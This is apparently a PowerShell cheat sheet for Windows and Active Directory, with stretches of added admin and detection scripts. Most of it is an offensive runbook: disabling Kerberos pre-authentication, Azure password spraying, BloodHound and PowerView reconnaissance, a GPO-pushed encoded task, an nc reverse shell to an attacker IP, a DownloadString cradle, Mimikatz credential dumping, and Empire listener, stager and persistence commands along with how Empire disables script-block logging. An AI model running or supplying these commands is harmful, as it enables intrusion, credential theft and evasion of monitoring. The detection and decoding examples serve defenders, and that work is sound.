Hooper Labs

PowerShell Tips and Tricks

List all services that do not run as a built-in account (LocalSystem, LocalService, NetworkService)

	Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* | Where-Object {($null -ne $_.ObjectName) -and ($_.ObjectName -notlike 'NT Authority\*') -and ($_.ObjectName -ne "LocalSystem")}
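The same hunt via CIM rather than the registry, as an added example (not from the original page): Win32_Service already carries the logon account, state and binary path, and the filter below also drops the per-service virtual accounts (NT SERVICE\*) that the registry one-liner lets through. The function name and the optional -ComputerName parameter are this example's own.

```powershell
# Added example: services whose logon account is not a built-in identity.
function Get-NonBuiltinServiceAccount {
    [CmdletBinding()]
    param([string]$ComputerName)   # omit for the local host (avoids a WinRM hop)

    # Built-in identities as they appear in Win32_Service.StartName.
    # -notin and -notlike are case-insensitive, which matters because some
    # installers write 'localSystem' or 'NT AUTHORITY\LOCALSERVICE'.
    $builtin = @('LocalSystem',
                 'NT AUTHORITY\LocalSystem',
                 'NT AUTHORITY\LocalService',
                 'NT AUTHORITY\NetworkService')

    $cimArgs = @{ ClassName = 'Win32_Service' }
    if ($ComputerName) { $cimArgs.ComputerName = $ComputerName }

    Get-CimInstance @cimArgs |
        Where-Object {
            $null -ne $_.StartName -and            # kernel-driver style entries have no account
            $_.StartName -notin $builtin -and
            $_.StartName -notlike 'NT SERVICE\*'   # per-service virtual accounts
        } |
        Select-Object Name, StartName, State, StartMode, PathName
}

# A domain or local user running a service is a credential the LSA must keep
# around, so these are the first things to look at for credential theft.
Get-NonBuiltinServiceAccount | Format-Table -AutoSize
```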

Comparison Operators

Greater Than / Less Than

Wildcard Matching

	-like 'powersh*'


Create a PSCredential

Enter a Remote Session (admin access required)

Run a Remote Command

	Get-WMIObject -ComputerName remotehost -Query "Select * from Win32_Service Where Name='LanManServer'" | Format-Table
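The three steps above (build a credential, open a remote session, run a remote command) as one added example that is not from the original page. The host name, user name and the OPS_PASSWORD environment variable are placeholders; the target must have WinRM enabled (TCP 5985/5986) and the account needs local admin or membership in Remote Management Users.

```powershell
# Added example: PSCredential + PowerShell remoting + CIM session, end to end.
$target   = 'remotehost'
$username = 'CORP\svc_ops'

# Get-Credential prompts interactively; for scripted use convert a plaintext
# password instead (placeholder pulled from an env var, never hard-coded).
$secure = ConvertTo-SecureString -String $env:OPS_PASSWORD -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential($username, $secure)

# Persistent session: variables and loaded modules survive between calls.
$session = New-PSSession -ComputerName $target -Credential $cred

# Run a script block remotely; $using: passes a local variable into the remote scope.
$svcName = 'LanManServer'
Invoke-Command -Session $session -ScriptBlock {
    Get-Service -Name $using:svcName | Select-Object Name, Status, StartType
}

# Same question over CIM: Get-CimInstance rides WinRM, whereas
# Get-WMIObject -ComputerName uses DCOM (RPC 135 + dynamic ports).
$cim = New-CimSession -ComputerName $target -Credential $cred
Get-CimInstance -CimSession $cim -ClassName Win32_Service -Filter "Name='$svcName'" |
    Format-Table Name, State, StartMode, StartName

# For an interactive prompt on the box instead: Enter-PSSession -Session $session
# (type 'exit' to come back to the local shell).
Remove-CimSession $cim
Remove-PSSession $session
```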

Disable Kerberos PreAuth

	Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose
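What the PowerView -XOR call above does to userAccountControl, and how to find accounts that already have pre-authentication disabled with nothing but built-in ADSI, as an added example (not from the original page). The function names are this example's own; the LDAP search assumes it runs on a domain-joined host with a reachable DC.

```powershell
# Added example: the DONT_REQ_PREAUTH bit, XOR vs OR, and an AS-REP roastable hunt.
$DONT_REQ_PREAUTH = 0x400000   # 4194304 in the Set-DomainObject command above

function Test-PreAuthDisabled([int]$Uac) { ($Uac -band $DONT_REQ_PREAUTH) -ne 0 }

# XOR toggles the bit: run the same command against an account that already has
# it set and pre-auth is silently re-enabled. -bor sets it idempotently,
# -band -bnot clears it.
function Set-PreAuthFlag([int]$Uac, [switch]$Disable) {
    if ($Disable) { $Uac -bor $DONT_REQ_PREAUTH }
    else          { $Uac -band (-bnot $DONT_REQ_PREAUTH) }
}

$normalUser   = 0x200                            # NORMAL_ACCOUNT only (512)
$toggled      = $normalUser -bxor $DONT_REQ_PREAUTH
$toggledTwice = $toggled    -bxor $DONT_REQ_PREAUTH
"{0}: preauth disabled = {1}" -f $toggled,      (Test-PreAuthDisabled $toggled)        # 4194816: True
"{0}: preauth disabled = {1}" -f $toggledTwice, (Test-PreAuthDisabled $toggledTwice)   # 512: False
"{0}: via -bor twice"         -f (Set-PreAuthFlag (Set-PreAuthFlag $normalUser -Disable) -Disable)  # stays 4194816

# Hunt: 1.2.840.113556.1.4.803 is LDAP's bitwise-AND matching rule, so this returns
# every user object with the flag set (the AS-REP roasting target list).
$filter   = "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=$DONT_REQ_PREAUTH))"
$searcher = [adsisearcher]$filter
$searcher.PropertiesToLoad.AddRange(@('samaccountname', 'useraccountcontrol'))
$searcher.FindAll() | ForEach-Object {
    [pscustomobject]@{
        SamAccountName = $_.Properties['samaccountname'][0]
        UAC            = $_.Properties['useraccountcontrol'][0]
    }
}
```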

Import a Module

	Import-Module -Name .\MSOLSpray.ps1

Azure Password Spray

	Invoke-MSOLSpray -Userlist ./users.txt -Password "Spring2020"

PowerShell Command History File

	%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
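Sweeping that history file across every profile on a host, as an added example (not from the original page). The indicator list is this example's own and deliberately short; reading other users' profiles needs admin.

```powershell
# Added example: collect all users' PSReadLine history and flag suspicious lines.
$patterns = @(
    'IEX', 'Invoke-Expression', 'DownloadString', 'DownloadFile',
    'FromBase64String', '-enc', '-EncodedCommand', 'Invoke-Mimikatz', 'bypass'
)
$regex = ($patterns | ForEach-Object { [regex]::Escape($_) }) -join '|'

# *_history.txt rather than ConsoleHost_history.txt: other hosts (VS Code, ISE
# with PSReadLine) write their own file in the same folder.
$histories = Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\*_history.txt' -ErrorAction SilentlyContinue

foreach ($file in $histories) {
    $user = $file.FullName.Split('\')[2]        # C:\Users\<user>\...
    Select-String -Path $file.FullName -Pattern $regex |
        ForEach-Object {
            [pscustomobject]@{
                User    = $user
                Line    = $_.LineNumber
                Command = $_.Line.Trim()
                File    = $file.FullName
            }
        }
}

# Caveat: only hosts that load PSReadLine write this file, and only for typed
# commands. Anything run via -Command / -EncodedCommand, from a script, or after
# 'Set-PSReadLineOption -HistorySaveStyle SaveNothing' never lands here; pair
# it with 4103/4104 events.
```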


List all Files in Directory

	Get-ChildItem C:\Users\user -Recurse

List Scheduled Tasks

Raw WQL Query (WMIC-style syntax, via the CIM cmdlets)

	Get-CimInstance -Query "SELECT * from Win32_Process WHERE name LIKE 'P%'"

Get AVs Installed

List All Classes in a Namespace

	Get-WmiObject -Namespace root\CIMv2 -List

List Running Services

	Get-WmiObject -Query "SELECT * FROM win32_service WHERE state='running'"

List Services Beginning with "T" (WQL LIKE is case-insensitive, so 't%' alone would do)

	Get-WmiObject -Query "SELECT * FROM win32_service WHERE name LIKE '[tT]%'"

List Processes Like "owershell" ('_' matches exactly one character)

	gwmi win32_process -Filter "name LIKE '_owershell%'"

Remote Get-WMIObject Command (DCOM: RPC 135 plus dynamic ports)

	Get-WMIObject -ComputerName remotehost -Query "Select * from Win32_Service Where Name='LanManServer'" | Format-Table
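The WQL queries above, taken a step further as an added example (not from the original page): it shows the two things that trip people up with -Filter (it is only the WHERE clause, and backslashes inside WQL strings must be doubled) and does the parent-process resolution that WQL cannot, since it has no JOIN. The directory and process names used in the filters are this example's own choices.

```powershell
# Added example: WQL filtering caveats and parent/child resolution over Win32_Process.

# Processes whose image lives under a Temp directory. The doubled '\' is WQL
# escaping; PowerShell double quotes do not treat '\' specially, so it passes
# through to WMI unchanged.
Get-CimInstance -ClassName Win32_Process -Filter "ExecutablePath LIKE '%\\Temp\\%'" |
    Select-Object ProcessId, Name, ExecutablePath

# Auto-start services that are not running: '<>' is WQL's inequality operator.
Get-CimInstance -ClassName Win32_Service -Filter "StartMode='Auto' AND State<>'Running'" |
    Select-Object Name, State, StartName

# Shells and who spawned them. WQL has no JOIN, so pull the table once and
# resolve ParentProcessId in PowerShell.
$procs = Get-CimInstance -ClassName Win32_Process
$byPid = @{}
foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

$procs | Where-Object { $_.Name -match '^(cmd|powershell|pwsh)\.exe$' } |
    ForEach-Object {
        $parent = $byPid[[int]$_.ParentProcessId]
        [pscustomobject]@{
            Pid         = $_.ProcessId
            Name        = $_.Name
            ParentPid   = $_.ParentProcessId
            ParentName  = if ($parent) { $parent.Name } else { '<exited>' }   # PID reuse is possible
            CommandLine = $_.CommandLine
        }
    }

# Remote variant: add -ComputerName <host> to Get-CimInstance (WinRM, 5985/5986)
# or use Get-WMIObject -ComputerName <host> (DCOM); pick whichever the firewall allows.
```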


EXE Ingestor

	.\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>

PowerShell Ingestor (SharpHound.ps1)

	Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>

Start Neo4J and Import Bloodhound Results


Enumerate User

	Get-NetUser <user>

Enumerate Group

	Get-NetGroup <group>

Enumerate Computers

	Get-NetComputer -FullData

Enumerate Live Machines

	Get-NetComputer -Ping

Get Groups for which User is member

	Get-NetGroup -Username <user>

Group Members

	Get-NetGroupMember <group> -Domain <DomainName>

Enumerate Domain Shares (add -CheckShareAccess to keep only shares the current user can read)

	Find-DomainShare (-CheckShareAccess)

Enumerate Group Policies


Enumerate Group Policy for Specific Computer

	Get-NetGPO -ComputerName cpu.local

Enumerate OUs


Enumerate ACLs

	Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs

Find Interesting ACEs

	Invoke-ACLScanner -ResolveGUIDs

Check ACLs associated with SMB Share

	Get-PathAcl -Path "\\Path\to\share"

Enumerate Domain Trusts


Enumerate Forest Trusts


Find All Local Admins

	Invoke-EnumerateLocalAdmin -Verbose

Find Computers Where Members of a Group Have Sessions (defaults to Domain Admins; -GroupName overrides, -Stealth only checks likely hosts such as file servers and DCs)

	Invoke-UserHunter -GroupName "RDPUsers" (-Stealth)

Copy an ACL from One File to Another (here: the default ACL of a freshly created file onto foobar.ps1)

	New-Item File.txt | Get-Acl | Set-Acl foobar.ps1

Get all effective members of a group (nested groups expanded)

	Get-NetGroupMember -GroupName <group> -Recurse

Search the forest global catalog

	Get-NetUser -UserName <user> -ADSpath "GC://domain.com"

Find Privileged Machine Accounts

	Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'}

Find Domain Admins and Users with same first/last name

	Get-NetGroupMember -GroupName "Domain Admins" -FullData | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)"} | Select-Object -Property displayname,samaccountname

Push an Immediate Scheduled Task via a GPO You Can Edit (PowerView)

	New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-NoP -NonI -W Hidden -Enc JABXAGMAPQBO...' -Force

Check Last Password Change

	Get-UserProperty -Properties pwdlastset

Find Logged In Users

	Get-NetLoggedOn -ComputerName <ComputerName>

Basic NC connectback (nc needs the attacker host before the port)

	powershell.exe -NoExit -Command 'C:/temp/temp2/nc.exe -v <AttackerIP> 4444 -e powershell.exe'

One-Liner (no script on disk)


Run remote script (in-memory)

	powershell -Command "$ip='http://A.B.C.D:22/launcher.ps1'; IEX (New-Object Net.WebClient).DownloadString($ip)"

Run remote HTA (in-memory)

Encoded Commands


Dump Creds

	Invoke-Mimikatz -DumpCreds -ComputerName remotehost

Execute Classic Mimikatz Commands

	Invoke-Mimikatz -Command '"privilege::debug"'

PowerShell Empire

Set up a HTTP Listener (C2 profile)

	listeners; uselistener http; set Host a.b.c.d:8080; execute;

Create an Empire launcher (rat/aka way to get shellz)

	listeners; usestager multi/launcher; set Listener http; set OutFile /opt/agent.ps1; generate

List all Agents


Interact with an Agent

	interact AGENT1

Rename an Agent

	rename AGENTNEW

Persist with a Module

	usemodule persistence/userland/schtasks; set Listener http; set IdleTime 2; set Agent autorun; run

Import a PowerShell Script and Run

	agents; interact AGENT1; scriptimport /opt/Do-Thing.ps1; scriptcmd Do-Thing

Empire PowerShell Payload (-w 1 = hidden window, -sta = single-threaded apartment, -enc = base64 of the UTF-16LE script)

	powershell -noP -sta -w 1 -enc <base64-encoded-payload>
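Turning a captured -enc command line (4688 or Sysmon event 1 CommandLine field) back into the script it runs, and building one the same way so the format is recognisable, as an added example that is not from the original page. Function names and the sample command line are this example's own; the payload in the sample is a constructed, benign placeholder.

```powershell
# Added example: encode and decode powershell.exe -EncodedCommand payloads.
function ConvertTo-EncodedCommand([string]$Script) {
    # -EncodedCommand expects base64 of the UTF-16LE bytes, not UTF-8.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommandLine([string]$CommandLine) {
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    # -enc, -EncodedC ...), case-insensitively. Match every "-e<letters> <token>"
    # and keep the one whose switch is actually a prefix of 'encodedcommand', so
    # '-ExecutionPolicy bypass' and '-ea silentlycontinue' are not misread.
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)')
    while ($m.Success) {
        $switch = $m.Groups[1].Value.ToLower()
        if ('encodedcommand'.StartsWith($switch)) {
            try   { $bytes = [Convert]::FromBase64String($m.Groups[2].Value) }
            catch { return $null }                    # truncated log field, not valid base64
            # Proper payloads are UTF-16LE: every second byte of ASCII text is NUL.
            # Some loaders base64 UTF-8 and decode it themselves; fall back for those.
            if ($bytes.Length -ge 2 -and $bytes[1] -eq 0) {
                return [Text.Encoding]::Unicode.GetString($bytes)
            }
            return [Text.Encoding]::UTF8.GetString($bytes)
        }
        $m = $m.NextMatch()
    }
    return $null
}

# Constructed sample with the shape of the Empire launcher line above.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://a.b.c.d:8080/launcher")'
$sample  = "powershell -noP -sta -w 1 -enc $(ConvertTo-EncodedCommand $payload)"

ConvertFrom-EncodedCommandLine $sample                                      # the IEX line above
ConvertFrom-EncodedCommandLine 'powershell -nop -ep bypass -c "whoami"'     # $null: nothing encoded
```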

ScriptBlock Logging

	Logging feature that records the de-obfuscated content of every script block PowerShell runs (event 4104 in Microsoft-Windows-PowerShell/Operational). The Empire launcher disables it in-process by reflectively editing the private "cachedGroupPolicySettings" dictionary in System.Management.Automation.Utils so EnableScriptBlockLogging reads as off; it also blanks the ScriptBlock class's private list of "suspicious strings", which is what triggers the warning-level 4104 entries that are written even when the policy is not enabled.

Query Windows Events

	Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational -MaxEvents 5

Query Specific Windows Event IDs

	Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=10}
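Putting the previous two sections together, as an added example (not from the original page): query 4104 script-block events and flag the ones that try to switch logging off or look like download cradles. The indicator table is this example's own; the matcher takes plain text so it also runs over the constructed samples included here without any logs present.

```powershell
# Added example: triage 4104 script-block events for logging tamper and cradles.
$indicators = [ordered]@{
    'ScriptBlockLogging tamper' = 'cachedGroupPolicySettings|EnableScriptBlockLogging'
    'AMSI tamper'               = 'AmsiUtils|amsiInitFailed|AmsiScanBuffer'
    'Download cradle'           = 'DownloadString|DownloadFile|Net\.WebClient'
    'Inline decode'             = 'FromBase64String'
    'Reflection abuse'          = '\[Ref\]\.Assembly|GetField\(.*NonPublic'
}

function Get-ScriptBlockIndicator([string]$ScriptBlockText) {
    foreach ($name in $indicators.Keys) {
        if ($ScriptBlockText -match $indicators[$name]) { $name }
    }
}

# Constructed samples, not real log data: the first mimics the Empire bypass
# described above, the second is an ordinary command.
$samples = @(
    '[Ref].Assembly.GetType(''System.Management.Automation.Utils'').GetField(''cachedGroupPolicySettings'',''NonPublic,Static'')',
    'Get-ChildItem C:\Users -Recurse | Measure-Object'
)
foreach ($s in $samples) {
    $hits = @(Get-ScriptBlockIndicator $s)
    "{0,-40} -> {1}" -f $s.Substring(0, [Math]::Min(40, $s.Length)), ($(if ($hits) { $hits -join ', ' } else { 'clean' }))
}
# First sample hits 'ScriptBlockLogging tamper' and 'Reflection abuse'; second is clean.

# Live query. 4104 = script block logged. Properties[2] is ScriptBlockText
# (0 and 1 are the chunk number/total for blocks split across events).
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $hits = @(Get-ScriptBlockIndicator $text)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Level   = $_.LevelDisplayName     # 'Warning' = PowerShell's own suspicious-string hit
                Hits    = $hits -join ', '
                Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
```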


List Environment Variables

	Get-ChildItem Env:

Quickly list out numbers


List Properties of a Registry Key

	(Get-Item HKLM:\SYSTEM\CurrentControlSet\Control\Lsa) | Get-ItemProperty

Dot-source a .PS1 File (loads its functions into the current session; use & or .\Add-SSP.ps1 to run it in its own scope instead)

	. .\Add-SSP